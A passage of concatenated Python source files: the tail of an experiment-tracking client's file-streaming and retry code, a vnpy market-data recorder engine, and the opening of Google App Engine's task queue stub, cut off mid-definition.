"Summary data exceeds maximum size of {}. Dropping it.".format( util.to_human_size(util.MAX_LINE_BYTES) ) wandb.termerror(msg, repeat=False) util.sentry_message(msg) return False return {"offset": 0, "content": [data]} @dataclass class StreamCRState: """There are two streams: stdout and stderr. We create two instances for each stream. An instance holds state about: found_cr: if a carriage return has been found in this stream. cr: most recent offset (line number) where we found \r. We update this offset with every progress bar update. last_normal: most recent offset without a \r in this stream. i.e the most recent "normal" line. """ found_cr: bool = False cr = None last_normal = None class CRDedupeFilePolicy(DefaultFilePolicy): """File stream policy that removes characters that would be erased by carriage returns. This is what a terminal does. We use it for console output to reduce the amount of data we need to send over the network (eg. for progress bars), while preserving the output's appearance in the web app. CR stands for "carriage return", for the character \r. It tells the terminal to move the cursor back to the start of the current line. Progress bars (like tqdm) use \r repeatedly to overwrite a line with newer updates. This gives the illusion of the progress bar filling up in real-time. """ def __init__(self, start_chunk_id=0): super(CRDedupeFilePolicy, self).__init__(start_chunk_id=start_chunk_id) self._prev_chunk = None self.global_offset = 0 # cr refers to carriage return \r self.stderr = StreamCRState() self.stdout = StreamCRState() def get_consecutive_offsets(self, console: Dict) -> List[Any]: """ Args: console: Dict[int, str] which maps offsets (line numbers) to lines of text. It represents a mini version of our console dashboard on the UI. Returns: A list of intervals (we compress consecutive line numbers into an interval). Example: >>> console = {2: "", 3: "", 4: "", 5: "", 10: "", 11: "", 20: ""} >>> get_consecutive_offsets(console) [(2, 5), (10, 11), (20, 20)] """ offsets = sorted(list(console.keys())) intervals: List = [] for i, num in enumerate(offsets): if i == 0: intervals.append([num, num]) continue largest = intervals[-1][1] if num == largest + 1: intervals[-1][1] = num else: intervals.append([num, num]) return intervals def split_chunk(self, chunk: Chunk) -> Tuple[str, str]: """ Args: chunk: object with two fields: filename (str) & data (str) `chunk.data` is a str containing the lines we want. It usually contains \n or \r or both. `chunk.data` has two possible formats (for the two streams - stdout and stderr): - "2020-08-25T20:38:36.895321 this is my line of text\nsecond line\n" - "ERROR 2020-08-25T20:38:36.895321 this is my line of text\nsecond line\nthird\n" Here's another example with a carriage return \r. - "ERROR 2020-08-25T20:38:36.895321 \r progress bar\n" Returns: A 2-tuple of strings. First str is prefix, either "ERROR {timestamp} " or "{timestamp} ". Second str is the rest of the string. Example: >>> chunk = Chunk(filename="output.log", data="ERROR 2020-08-25T20:38 this is my line of text\n") >>> split_chunk(chunk) ("ERROR 2020-08-25T20:38 ", "this is my line of text\n") """ prefix = "" token, rest = chunk.data.split(" ", 1) if token == "ERROR": prefix += token + " " token, rest = rest.split(" ", 1) prefix += token + " " return prefix, rest def process_chunks(self, chunks: List) -> List[Dict]: """ Args: chunks: List of Chunk objects. See description of chunk above in `split_chunk(...)`. Returns: List[Dict]. Each dict in the list contains two keys: an `offset` which holds the line number and `content` which maps to a list of consecutive lines starting from that offset. `offset` here means global line number in our console on the UI. Example: >>> chunks = [ Chunk("output.log", "ERROR 2020-08-25T20:38 this is my line of text\nboom\n"), Chunk("output.log", "2020-08-25T20:38 this is test\n"), ] >>> process_chunks(chunks) [ {"offset": 0, "content": [ "ERROR 2020-08-25T20:38 this is my line of text\n", "ERROR 2020-08-25T20:38 boom\n", "2020-08-25T20:38 this is test\n" ] } ] """ # Dict[int->str], each offset (line number) mapped to a line. # Represents a mini-version of our console pane on the UI. console = {} sep = os.linesep for c in chunks: prefix, logs_str = self.split_chunk(c) logs = logs_str.split(sep) for line in logs: stream = self.stderr if prefix.startswith("ERROR ") else self.stdout if line.startswith("\r"): # line starting with \r will always overwrite a previous offset. offset = stream.cr if stream.found_cr else stream.last_normal or 0 stream.cr = offset stream.found_cr = True console[offset] = prefix + line[1:] + "\n" # Usually logs_str = "\r progress bar\n" for progress bar updates. # If instead logs_str = "\r progress bar\n text\n text\n", # treat this as the end of a progress bar and reset accordingly. if ( logs_str.count(sep) > 1 and logs_str.replace(sep, "").count("\r") == 1 ): stream.found_cr = False elif line: console[self.global_offset] = prefix + line + "\n" stream.last_normal = self.global_offset self.global_offset += 1 intervals = self.get_consecutive_offsets(console) ret = [] for (a, b) in intervals: ret.append({"offset": a, "content": [console[i] for i in range(a, b + 1)]}) return ret class BinaryFilePolicy(DefaultFilePolicy): def process_chunks(self, chunks): data = b"".join([c.data for c in chunks]) enc = base64.b64encode(data).decode("ascii") self._offset += len(data) return {"offset": self._offset, "content": enc, "encoding": "base64"} class FileStreamApi(object): """Pushes chunks of files to our streaming endpoint. This class is used as a singleton. It has a thread that serializes access to the streaming endpoint and performs rate-limiting and batching. TODO: Differentiate between binary/text encoding. """ Finish = collections.namedtuple("Finish", ("exitcode")) Preempting = collections.namedtuple("Preempting", ()) PushSuccess = collections.namedtuple("PushSuccess", ("artifact_id", "save_name")) HTTP_TIMEOUT = env.get_http_timeout(10) MAX_ITEMS_PER_PUSH = 10000 def __init__(self, api, run_id, start_time, settings=None): if settings is None: settings = dict() # NOTE: exc_info is set in thread_except_body context and readable by calling threads self._exc_info = None self._settings = settings self._api = api self._run_id = run_id self._start_time = start_time self._client = requests.Session() self._client.auth = ("api", api.api_key) self._client.timeout = self.HTTP_TIMEOUT self._client.headers.update( { "User-Agent": api.user_agent, "X-WANDB-USERNAME": env.get_username(), "X-WANDB-USER-EMAIL": env.get_user_email(), } ) self._file_policies = {} self._dropped_chunks = 0 self._queue = queue.Queue() self._thread = threading.Thread(target=self._thread_except_body) # It seems we need to make this a daemon thread to get sync.py's atexit handler to run, which # cleans this thread up. self._thread.name = "FileStreamThread" self._thread.daemon = True self._init_endpoint() def _init_endpoint(self): settings = self._api.settings() settings.update(self._settings) self._endpoint = "{base}/files/{entity}/{project}/{run}/file_stream".format( base=settings["base_url"], entity=settings["entity"], project=settings["project"], run=self._run_id, ) def start(self): self._init_endpoint() self._thread.start() def set_default_file_policy(self, filename, file_policy): """Set an upload policy for a file unless one has already been set.""" if filename not in self._file_policies: self._file_policies[filename] = file_policy def set_file_policy(self, filename, file_policy): self._file_policies[filename] = file_policy @property def heartbeat_seconds(self): # Defaults to 30 return self._api.dynamic_settings["heartbeat_seconds"] def rate_limit_seconds(self): run_time = time.time() - self._start_time if run_time < 60: return max(1, self.heartbeat_seconds / 15) elif run_time < 300: return max(2.5, self.heartbeat_seconds / 3) else: return max(5, self.heartbeat_seconds) def _read_queue(self): # called from the push thread (_thread_body), this does an initial read # that'll block for up to rate_limit_seconds. Then it tries to read # as much out of the queue as it can. We do this because the http post # to the server happens within _thread_body, and can take longer than # our rate limit. So next time we get a chance to read the queue we want # read all the stuff that queue'd up since last time. # # If we have more than MAX_ITEMS_PER_PUSH in the queue then the push thread # will get behind and data will buffer up in the queue. return util.read_many_from_queue( self._queue, self.MAX_ITEMS_PER_PUSH, self.rate_limit_seconds() ) def _thread_body(self): posted_data_time = time.time() posted_anything_time = time.time() ready_chunks = [] uploaded = set() finished = None while finished is None: items = self._read_queue() for item in items: if isinstance(item, self.Finish): finished = item elif isinstance(item, self.Preempting): request_with_retry( self._client.post, self._endpoint, json={ "complete": False, "preempting": True, "dropped": self._dropped_chunks, "uploaded": list(uploaded), }, ) uploaded = set() elif isinstance(item, self.PushSuccess): uploaded.add(item.save_name) else: # item is Chunk ready_chunks.append(item) cur_time = time.time() if ready_chunks and ( finished or cur_time - posted_data_time > self.rate_limit_seconds() ): posted_data_time = cur_time posted_anything_time = cur_time self._send(ready_chunks) ready_chunks = [] if cur_time - posted_anything_time > self.heartbeat_seconds: posted_anything_time = cur_time self._handle_response( request_with_retry( self._client.post, self._endpoint, json={ "complete": False, "failed": False, "dropped": self._dropped_chunks, "uploaded": list(uploaded), }, ) ) uploaded = set() # post the final close message. (item is self.Finish instance now) request_with_retry( self._client.post, self._endpoint, json={ "complete": True, "exitcode": int(finished.exitcode), "dropped": self._dropped_chunks, "uploaded": list(uploaded), }, ) def _thread_except_body(self): # TODO: Consolidate with internal_util.ExceptionThread try: self._thread_body() except Exception as e: exc_info = sys.exc_info() self._exc_info = exc_info logger.exception("generic exception in filestream thread") util.sentry_exc(exc_info, delay=True) raise e def _handle_response(self, response): """Logs dropped chunks and updates dynamic settings""" if isinstance(response, Exception): wandb.termerror( "Dropped streaming file chunk (see wandb/debug-internal.log)" ) logging.exception("dropped chunk %s" % response) self._dropped_chunks += 1 else: parsed: dict = None try: parsed = response.json() except Exception: pass if isinstance(parsed, dict): limits = parsed.get("limits") if isinstance(limits, dict): self._api.dynamic_settings.update(limits) def _send(self, chunks): # create files dict. dict of <filename: chunks> pairs where chunks is a list of # [chunk_id, chunk_data] tuples (as lists since this will be json). files = {} # Groupby needs group keys to be consecutive, so sort first. chunks.sort(key=lambda c: c.filename) for filename, file_chunks in itertools.groupby(chunks, lambda c: c.filename): file_chunks = list(file_chunks) # groupby returns iterator # Specific file policies are set by internal/sender.py self.set_default_file_policy(filename, DefaultFilePolicy()) files[filename] = self._file_policies[filename].process_chunks(file_chunks) if not files[filename]: del files[filename] for fs in file_stream_utils.split_files(files, max_bytes=util.MAX_LINE_BYTES): self._handle_response( request_with_retry( self._client.post, self._endpoint, json={"files": fs, "dropped": self._dropped_chunks}, retry_callback=self._api.retry_callback, ) ) def stream_file(self, path): name = path.split("/")[-1] with open(path) as f: self._send([Chunk(name, line) for line in f]) def enqueue_preempting(self): self._queue.put(self.Preempting()) def push(self, filename, data): """Push a chunk of a file to the streaming endpoint. Arguments: filename: Name of file that this is a chunk of. chunk_id: TODO: change to 'offset' chunk: File data. """ self._queue.put(Chunk(filename, data)) def push_success(self, artifact_id, save_name): """Notification that a file upload has been successfully completed Arguments: artifact_id: ID of artifact save_name: saved name of the uploaded file """ self._queue.put(self.PushSuccess(artifact_id, save_name)) def finish(self, exitcode): """Cleans up. Anything pushed after finish will be dropped. Arguments: exitcode: The exitcode of the watched process. """ self._queue.put(self.Finish(exitcode)) # TODO(jhr): join on a thread which exited with an exception is a noop, clean up this path self._thread.join() if self._exc_info: logger.error("FileStream exception", exc_info=self._exc_info) # reraising the original exception, will get recaught in internal.py for the sender thread six.reraise(*self._exc_info) MAX_SLEEP_SECONDS = 60 * 5 def request_with_retry(func, *args, **kwargs): """Perform a requests http call, retrying with exponential backoff. Arguments: func: An http-requesting function to call, like requests.post max_retries: Maximum retries before giving up. By default we retry 30 times in ~2 hours before dropping the chunk *args: passed through to func **kwargs: passed through to func """ max_retries = kwargs.pop("max_retries", 30) retry_callback = kwargs.pop("retry_callback", None) sleep = 2 retry_count = 0 while True: try: response = func(*args, **kwargs) response.raise_for_status() return response except ( requests.exceptions.ConnectionError, requests.exceptions.HTTPError, requests.exceptions.Timeout, ) as e: if isinstance(e, requests.exceptions.HTTPError): # Non-retriable HTTP errors. # # We retry 500s just to be cautious, and because the back end # returns them when there are infrastructure issues. If retrying # some request winds up being problematic, we'll change the # back end to indicate that it shouldn't be retried. if e.response is not None and e.response.status_code in { 400, 403, 404, 409, }: return e if retry_count == max_retries: return e retry_count += 1 delay = sleep + random.random() * 0.25 * sleep if isinstance(e, requests.exceptions.HTTPError) and ( e.response is not None and e.response.status_code == 429 ): err_str = "Filestream rate limit exceeded, retrying in {} seconds".format( delay ) if retry_callback: retry_callback(e.response.status_code, err_str) logger.info(err_str) else: pass logger.warning( "requests_with_retry encountered retryable exception: %s. func: %s, args: %s, kwargs: %s", e, func, args, kwargs, ) time.sleep(delay) sleep *= 2 if sleep > MAX_SLEEP_SECONDS: sleep = MAX_SLEEP_SECONDS except requests.exceptions.RequestException as e: error_message = "unknown error" try: error_message = response.json()["error"] # XXX clean this up except Exception: pass logger.error("requests_with_retry error: {}".format(error_message)) logger.exception( "requests_with_retry encountered unretryable exception: %s", e ) return e
engine.py
import sys from threading import Thread from queue import Queue, Empty from copy import copy from collections import defaultdict from typing import Any, Dict, List from vnpy.event import Event, EventEngine from vnpy.trader.engine import BaseEngine, MainEngine from vnpy.trader.constant import Exchange from vnpy.trader.object import ( SubscribeRequest, TickData, BarData, ContractData ) from vnpy.trader.event import EVENT_TICK, EVENT_CONTRACT, EVENT_TIMER from vnpy.trader.utility import load_json, save_json, BarGenerator from vnpy.trader.database import BaseDatabase, get_database from vnpy_spreadtrading.base import EVENT_SPREAD_DATA, SpreadData APP_NAME: str = "DataRecorder" EVENT_RECORDER_LOG: str = "eRecorderLog" EVENT_RECORDER_UPDATE: str = "eRecorderUpdate" EVENT_RECORDER_EXCEPTION: str = "eRecorderException" class RecorderEngine(BaseEngine): """ For running data recorder. """ setting_filename: str = "data_recorder_setting.json" def __init__(self, main_engine: MainEngine, event_engine: EventEngine) -> None: """""" super().__init__(main_engine, event_engine, APP_NAME) self.queue: Queue = Queue() self.thread: Thread = Thread(target=self.run) self.active: bool = False self.tick_recordings: Dict[str, Dict] = {} self.bar_recordings: Dict[str, Dict] = {} self.bar_generators: Dict[str, BarGenerator] = {} self.timer_count: int = 0 self.timer_interval: int = 10 self.ticks: Dict[str, List[TickData]] = defaultdict(list) self.bars: Dict[str, List[BarData]] = defaultdict(list) self.database: BaseDatabase = get_database() ##源码修改,支持按照账号存储数据 def engine_start(self, account_name: str): self.load_setting(account_name) self.register_event() self.start() self.put_event() def load_setting(self, account_name: str) -> None: """""" file_name = self.setting_filename.split(".")[0] self.setting_filename = f"{file_name}_{account_name}.json" setting: dict = load_json(self.setting_filename) self.tick_recordings = setting.get("tick", {}) self.bar_recordings = setting.get("bar", {}) def save_setting(self) -> None: """""" setting: dict = { "tick": self.tick_recordings, "bar": self.bar_recordings } save_json(self.setting_filename, setting) def run(self) -> None: """""" while self.active: try: task: Any = self.queue.get(timeout=1) task_type, data = task if task_type == "tick": self.database.save_tick_data(data) elif task_type == "bar": self.database.save_bar_data(data) except Empty: continue except Exception: self.active = False info = sys.exc_info() event: Event = Event(EVENT_RECORDER_EXCEPTION, info) self.event_engine.put(event) def close(self) -> None: """""" self.active = False if self.thread.isAlive(): self.thread.join() def start(self) -> None: """""" self.active = True self.thread.start() def add_bar_recording(self, vt_symbol: str) -> None: """""" if vt_symbol in self.bar_recordings: self.write_log(f"已在K线记录列表中:{vt_symbol}") return if Exchange.LOCAL.value not in vt_symbol: contract: ContractData = self.main_engine.get_contract(vt_symbol) if not contract: self.write_log(f"找不到合约:{vt_symbol}") return self.bar_recordings[vt_symbol] = { "symbol": contract.symbol, "exchange": contract.exchange.value, "gateway_name": contract.gateway_name } self.subscribe(contract) else: self.bar_recordings[vt_symbol] = {} self.save_setting() self.put_event() self.write_log(f"添加K线记录成功:{vt_symbol}") def add_tick_recording(self, vt_symbol: str) -> None: """""" if vt_symbol in self.tick_recordings: self.write_log(f"已在Tick记录列表中:{vt_symbol}") return # For normal contract if Exchange.LOCAL.value not in vt_symbol: contract: ContractData = self.main_engine.get_contract(vt_symbol) if not contract: self.write_log(f"找不到合约:{vt_symbol}") return self.tick_recordings[vt_symbol] = { "symbol": contract.symbol, "exchange": contract.exchange.value, "gateway_name": contract.gateway_name } self.subscribe(contract) # No need to subscribe for spread data else: self.tick_recordings[vt_symbol] = {} self.save_setting() self.put_event() self.write_log(f"添加Tick记录成功:{vt_symbol}") def remove_bar_recording(self, vt_symbol: str) -> None: """""" if vt_symbol not in self.bar_recordings: self.write_log(f"不在K线记录列表中:{vt_symbol}") return self.bar_recordings.pop(vt_symbol) self.save_setting() self.put_event() self.write_log(f"移除K线记录成功:{vt_symbol}") def remove_tick_recording(self, vt_symbol: str) -> None: """""" if vt_symbol not in self.tick_recordings: self.write_log(f"不在Tick记录列表中:{vt_symbol}") return self.tick_recordings.pop(vt_symbol) self.save_setting() self.put_event() self.write_log(f"移除Tick记录成功:{vt_symbol}") def register_event(self) -> None: """""" self.event_engine.register(EVENT_TIMER, self.process_timer_event) self.event_engine.register(EVENT_TICK, self.process_tick_event) self.event_engine.register(EVENT_CONTRACT, self.process_contract_event) self.event_engine.register(EVENT_SPREAD_DATA, self.process_spread_event) def update_tick(self, tick: TickData) -> None: """""" if tick.vt_symbol in self.tick_recordings: self.record_tick(copy(tick)) if tick.vt_symbol in self.bar_recordings: bg: BarGenerator = self.get_bar_generator(tick.vt_symbol) bg.update_tick(copy(tick)) def process_timer_event(self, event: Event) -> None: """""" self.timer_count += 1 if self.timer_count < self.timer_interval: return self.timer_count = 0 for bars in self.bars.values(): self.queue.put(("bar", bars)) self.bars.clear() for ticks in self.ticks.values(): self.queue.put(("tick", ticks)) self.ticks.clear() def process_tick_event(self, event: Event) -> None: """""" tick: TickData = event.data self.update_tick(tick) def process_contract_event(self, event: Event) -> None: """""" contract: ContractData = event.data vt_symbol: str = contract.vt_symbol if (vt_symbol in self.tick_recordings or vt_symbol in self.bar_recordings): self.subscribe(contract) def process_spread_event(self, event: Event) -> None: """""" spread: SpreadData = event.data tick: TickData = spread.to_tick() # Filter not inited spread data if tick.datetime: self.update_tick(tick) def write_log(self, msg: str) -> None: """""" event: Event = Event( EVENT_RECORDER_LOG, msg ) self.event_engine.put(event) def put_event(self) -> None: """""" tick_symbols: List[str] = list(self.tick_recordings.keys()) tick_symbols.sort() bar_symbols: List[str] = list(self.bar_recordings.keys()) bar_symbols.sort() data: dict = { "tick": tick_symbols, "bar": bar_symbols } event: Event = Event( EVENT_RECORDER_UPDATE, data ) self.event_engine.put(event) def record_tick(self, tick: TickData) -> None: """""" self.ticks[tick.vt_symbol].append(tick) def record_bar(self, bar: BarData) -> None: """""" self.bars[bar.vt_symbol].append(bar) def get_bar_generator(self, vt_symbol: str) -> BarGenerator: """""" bg: BarGenerator = self.bar_generators.get(vt_symbol, None) if not bg: bg: BarGenerator = BarGenerator(self.record_bar) self.bar_generators[vt_symbol] = bg return bg def subscribe(self, contract: ContractData) -> None: """""" req: SubscribeRequest = SubscribeRequest( symbol=contract.symbol, exchange=contract.exchange ) self.main_engine.subscribe(req, contract.gateway_name)
taskqueue_stub.py
#!/usr/bin/env python # # Copyright 2007 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Stub version of the Task Queue API. This stub stores tasks and runs them via dev_appserver's AddEvent capability. It also validates the tasks by checking their queue name against the queue.yaml. As well as implementing Task Queue API functions, the stub exposes various other functions that are used by the dev_appserver's admin console to display the application's queues and tasks. """ from __future__ import with_statement __all__ = [] import base64 import bisect import calendar import datetime import logging import os import random import string import threading import time import taskqueue_service_pb import taskqueue from google.appengine.api import api_base_pb from google.appengine.api import apiproxy_stub from google.appengine.api import apiproxy_stub_map from google.appengine.api import queueinfo from google.appengine.api import request_info from google.appengine.api.taskqueue import taskqueue from google.appengine.runtime import apiproxy_errors DEFAULT_RATE = '5.00/s' DEFAULT_RATE_FLOAT = 5.0 DEFAULT_BUCKET_SIZE = 5 MAX_ETA = datetime.timedelta(days=30) MAX_PULL_TASK_SIZE_BYTES = 2 ** 20 MAX_PUSH_TASK_SIZE_BYTES = 100 * (2 ** 10) MAX_TASK_SIZE = MAX_PUSH_TASK_SIZE_BYTES MAX_REQUEST_SIZE = 32 << 20 BUILT_IN_HEADERS = set(['x-appengine-queuename', 'x-appengine-taskname', 'x-appengine-taskexecutioncount', 'x-appengine-taskpreviousresponse', 'x-appengine-taskretrycount', 'x-appengine-tasketa', 'x-appengine-development-payload', 'content-length']) DEFAULT_QUEUE_NAME = 'default' INF = 1e500 QUEUE_MODE = taskqueue_service_pb.TaskQueueMode AUTOMATIC_QUEUES = { DEFAULT_QUEUE_NAME: (0.2, DEFAULT_BUCKET_SIZE, DEFAULT_RATE), '__cron': (1, 1, '1/s')} def _GetAppId(request): """Returns the app id to use for the given request. Args: request: A protocol buffer that has an app_id field. Returns: A string containing the app id or None if no app id was specified. """ if request.has_app_id(): return request.app_id() else: return None def _SecToUsec(t): """Converts a time in seconds since the epoch to usec since the epoch. Args: t: Time in seconds since the unix epoch Returns: An integer containing the number of usec since the unix epoch. """ return int(t * 1e6) def _UsecToSec(t): """Converts a time in usec since the epoch to seconds since the epoch. Args: t: Time in usec since the unix epoch Returns: A float containing the number of seconds since the unix epoch. """ return t / 1e6 def _FormatEta(eta_usec): """Formats a task ETA as a date string in UTC.""" eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec)) return eta.strftime('%Y/%m/%d %H:%M:%S') def _TruncDelta(timedelta): """Strips the microseconds field from a timedelta. Args: timedelta: a datetime.timedelta. Returns: A datetime.timedelta with the microseconds field not filled. """ return datetime.timedelta(days=timedelta.days, seconds=timedelta.seconds) def _EtaDelta(eta_usec, now): """Formats a task ETA as a relative time string.""" eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec)) if eta > now: return '%s from now' % _TruncDelta(eta - now) else: return '%s ago' % _TruncDelta(now - eta) def QueryTasksResponseToDict(queue_name, task_response, now): """Converts a TaskQueueQueryTasksResponse_Task protobuf group into a dict. Args: queue_name: The name of the queue this task came from. task_response: An instance of TaskQueueQueryTasksResponse_Task. now: A datetime.datetime object containing the current time in UTC. Returns: A dict containing the fields used by the dev appserver's admin console. Raises: ValueError: A task response contains an unknown HTTP method type. """ task = {} task['name'] = task_response.task_name() task['queue_name'] = queue_name task['url'] = task_response.url() method = task_response.method() if method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET: task['method'] = 'GET' elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST: task['method'] = 'POST' elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.HEAD: task['method'] = 'HEAD' elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.PUT: task['method'] = 'PUT' elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.DELETE: task['method'] = 'DELETE' else: raise ValueError('Unexpected method: %d' % method) task['eta'] = _FormatEta(task_response.eta_usec()) task['eta_usec'] = task_response.eta_usec() task['eta_delta'] = _EtaDelta(task_response.eta_usec(), now) task['body'] = base64.b64encode(task_response.body()) headers = [(header.key(), header.value()) for header in task_response.header_list() if header.key().lower() not in BUILT_IN_HEADERS] headers.append(('X-AppEngine-QueueName', queue_name)) headers.append(('X-AppEngine-TaskName', task_response.task_name())) headers.append(('X-AppEngine-TaskRetryCount', str(task_response.retry_count()))) headers.append(('X-AppEngine-TaskETA', str(_UsecToSec(task_response.eta_usec())))) headers.append(('X-AppEngine-Development-Payload', '1')) headers.append(('Content-Length', str(len(task['body'])))) if 'content-type' not in frozenset(key.lower() for key, _ in headers): headers.append(('Content-Type', 'application/octet-stream')) headers.append(('X-AppEngine-TaskExecutionCount', str(task_response.execution_count()))) if task_response.has_runlog() and task_response.runlog().has_response_code(): headers.append(('X-AppEngine-TaskPreviousResponse', str(task_response.runlog().response_code()))) task['headers'] = headers return task class _Group(object): """A taskqueue group. This class contains all of the queues for an application. """ def __init__(self, queue_yaml_parser=None, app_id=None, _all_queues_valid=False, _update_newest_eta=None, _testing_validate_state=False): """Constructor. Args: queue_yaml_parser: A function that takes no parameters and returns the parsed results of the queue.yaml file. If this queue is not based on a queue.yaml file use None. app_id: The app id this Group is representing or None if it is the currently running application. _all_queues_valid: Automatically generate queues on first access. _update_newest_eta: Callable for automatically executing tasks. Takes the ETA of the task in seconds since the epoch, the queue_name and a task name. May be None if automatic task running is disabled. _testing_validate_state: Should this _Group and all of its _Queues validate their state after each operation? This should only be used during testing of the taskqueue_stub. """ self._queues = {} self._queue_yaml_parser = queue_yaml_parser self._all_queues_valid = _all_queues_valid self._next_task_id = 1 self._app_id = app_id if _update_newest_eta is None: self._update_newest_eta = lambda x: None else: self._update_newest_eta = _update_newest_eta self._testing_validate_state = _testing_validate_state def GetQueuesAsDicts(self): """Gets all the applications's queues. Returns: A list of dictionaries, where each dictionary contains one queue's attributes. E.g.: [{'name': 'some-queue', 'max_rate': '1/s', 'bucket_size': 5, 'oldest_task': '2009/02/02 05:37:42', 'eta_delta': '0:00:06.342511 ago', 'tasks_in_queue': 12, 'acl': ['user1@gmail.com']}, ...] The list of queues always includes the default queue. """ self._ReloadQueuesFromYaml() now = datetime.datetime.utcnow() queues = [] for queue_name, queue in sorted(self._queues.items()): queue_dict = {} queues.append(queue_dict) queue_dict['name'] = queue_name queue_dict['bucket_size'] = queue.bucket_capacity if queue.user_specified_rate is not None: queue_dict['max_rate'] = queue.user_specified_rate else: queue_dict['max_rate'] = '' if queue.queue_mode == QUEUE_MODE.PULL: queue_dict['mode'] = 'pull' else: queue_dict['mode'] = 'push' queue_dict['acl'] = queue.acl oldest_eta = queue.Oldest() if oldest_eta: queue_dict['oldest_task'] = _FormatEta(oldest_eta) queue_dict['eta_delta'] = _EtaDelta(oldest_eta, now) else: queue_dict['oldest_task'] = '' queue_dict['eta_delta'] = '' queue_dict['tasks_in_queue'] = queue.Count() if queue.retry_parameters: retry_proto = queue.retry_parameters retry_dict = {} if retry_proto.has_retry_limit(): retry_dict['retry_limit'] = retry_proto.retry_limit() if retry_proto.has_age_limit_sec(): retry_dict['age_limit_sec'] = retry_proto.age_limit_sec() if retry_proto.has_min_backoff_sec(): retry_dict['min_backoff_sec'] = retry_proto.min_backoff_sec() if retry_proto.has_max_backoff_sec(): retry_dict['max_backoff_sec'] = retry_proto.max_backoff_sec() if retry_proto.has_max_doublings(): retry_dict['max_doublings'] = retry_proto.max_doublings() queue_dict['retry_parameters'] = retry_dict return queues def HasQueue(self, queue_name): """Check if the specified queue_name references a valid queue. Args: queue_name: The name of the queue to check. Returns: True if the queue exists, False otherwise. """ self._ReloadQueuesFromYaml() return queue_name in self._queues and ( self._queues[queue_name] is not None) def GetQueue(self, queue_name): """Gets the _Queue instance for the specified queue. Args: queue_name: The name of the queue to fetch. Returns: The _Queue instance for the specified queue. Raises: KeyError if the queue does not exist. """ self._ReloadQueuesFromYaml() return self._queues[queue_name] def GetNextPushTask(self): """Finds the task with the lowest eta. Returns: A tuple containing the queue and task instance for the task with the lowest eta, or (None, None) if there are no tasks. """ min_eta = INF result = None, None for queue in self._queues.itervalues(): if queue.queue_mode == QUEUE_MODE.PULL: continue task = queue.OldestTask() if not task: continue if task.eta_usec() < min_eta: result = queue, task min_eta = task.eta_usec() return result def _ConstructQueue(self, queue_name, *args, **kwargs): if '_testing_validate_state' in kwargs: raise TypeError( '_testing_validate_state should not be passed to _ConstructQueue') kwargs['_testing_validate_state'] = self._testing_validate_state self._queues[queue_name] = _Queue(queue_name, *args, **kwargs) def _ConstructAutomaticQueue(self, queue_name): if queue_name in AUTOMATIC_QUEUES: self._ConstructQueue(queue_name, *AUTOMATIC_QUEUES[queue_name]) else: assert self._all_queues_valid self._ConstructQueue(queue_name) def _ReloadQueuesFromYaml(self): """Update the queue map with the contents of the queue.yaml file. This function will remove queues that no longer exist in the queue.yaml file. If no queue yaml parser has been defined, this function is a no-op. """ if not self._queue_yaml_parser: return queue_info = self._queue_yaml_parser() if queue_info and queue_info.queue: queues = queue_info.queue else: queues = [] old_queues = set(self._queues) new_queues = set() for entry in queues: queue_name = entry.name new_queues.add(queue_name) retry_parameters = None if entry.bucket_size: bucket_size = entry.bucket_size else: bucket_size = DEFAULT_BUCKET_SIZE if entry.retry_parameters: retry_parameters = queueinfo.TranslateRetryParameters( entry.retry_parameters) if entry.mode == 'pull': mode = QUEUE_MODE.PULL if entry.rate is not None: logging.warning( 'Refill rate must not be specified for pull-based queue. ' 'Please check queue.yaml file.') else: mode = QUEUE_MODE.PUSH if entry.rate is None: logging.warning( 'Refill rate must be specified for push-based queue. ' 'Please check queue.yaml file.') max_rate = entry.rate if entry.acl is not None: acl = taskqueue_service_pb.TaskQueueAcl() for acl_entry in entry.acl: acl.add_user_email(acl_entry.user_email) else: acl = None if self._queues.get(queue_name) is None: self._ConstructQueue(queue_name, bucket_capacity=bucket_size, user_specified_rate=max_rate, queue_mode=mode, acl=acl, retry_parameters=retry_parameters, target=entry.target) else: queue = self._queues[queue_name] queue.bucket_size = bucket_size queue.user_specified_rate = max_rate queue.acl = acl queue.queue_mode = mode queue.retry_parameters = retry_parameters if mode == QUEUE_MODE.PUSH: eta = queue.Oldest() if eta: self._update_newest_eta(_UsecToSec(eta)) if DEFAULT_QUEUE_NAME not in self._queues: self._ConstructAutomaticQueue(DEFAULT_QUEUE_NAME) new_queues.add(DEFAULT_QUEUE_NAME) if not self._all_queues_valid: for queue_name in old_queues - new_queues: del self._queues[queue_name] def _ValidateQueueName(self, queue_name): """Tests if the specified queue exists and creates it if needed. This function replicates the behaviour of the taskqueue service by automatically creating the 'automatic' queues when they are first accessed. Args: queue_name: The name queue of the queue to check. Returns: If there are no problems, returns TaskQueueServiceError.OK. Otherwise returns the correct constant from TaskQueueServiceError. """ if not queue_name: return taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_NAME elif queue_name not in self._queues: if queue_name in AUTOMATIC_QUEUES or self._all_queues_valid: self._ConstructAutomaticQueue(queue_name) else: return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE elif self._queues[queue_name] is None: return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE return taskqueue_service_pb.TaskQueueServiceError.OK def _CheckQueueForRpc(self, queue_name): """Ensures the specified queue exists and creates it if needed. This function replicates the behaviour of the taskqueue service by automatically creating the 'automatic' queues when they are first accessed. Args: queue_name: The name queue of the queue to check Raises: ApplicationError: If the queue name is invalid, tombstoned or does not exist. """ self._ReloadQueuesFromYaml() response = self._ValidateQueueName(queue_name) if response != taskqueue_service_pb.TaskQueueServiceError.OK: raise apiproxy_errors.ApplicationError(response) def _ChooseTaskName(self): """Returns a string containing a unique task name.""" self._next_task_id += 1 return 'task%d' % (self._next_task_id - 1) def 